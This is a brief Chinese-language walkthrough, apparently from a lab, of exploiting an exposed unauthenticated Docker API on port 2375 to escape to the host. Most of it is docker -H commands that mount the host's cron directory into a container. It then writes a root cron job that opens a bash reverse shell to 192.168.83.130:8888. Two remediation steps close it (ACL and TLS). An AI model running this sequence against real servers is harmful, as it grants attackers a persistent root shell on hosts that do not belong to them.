一、环境配置
二、浏览器访问http://192.168.83.26:2375/version证明漏洞存在
三、
docker客户端远程链接
docker -H tcp://192.168.83.26:2375 version
看镜像
docker -H tcp://192.168.83.26:2375 images
开内置docker环境,把服务器计划任务挂在到容器/tmp目录
docker -H tcp://192.168.83.26:2375 run -id -v /var/spool/cron
docker -H tcp://192.168.83.26:2375 ps -a
docker -H tcp://192.168.83.26:2375 exec -it 1ff9dd5b03e6 /bin/bash
写计划任务反弹
echo '* * * * * bash -i >& /dev/tcp/192.168.83.130/8888 0>&1' >> root
docker逃逸,宿主机shell反弹成功,拿下服务器。
修复方法:
1、设置ACL,只允许信任ip连接对应端口
2、开启TLS,使用生成的证书进行认证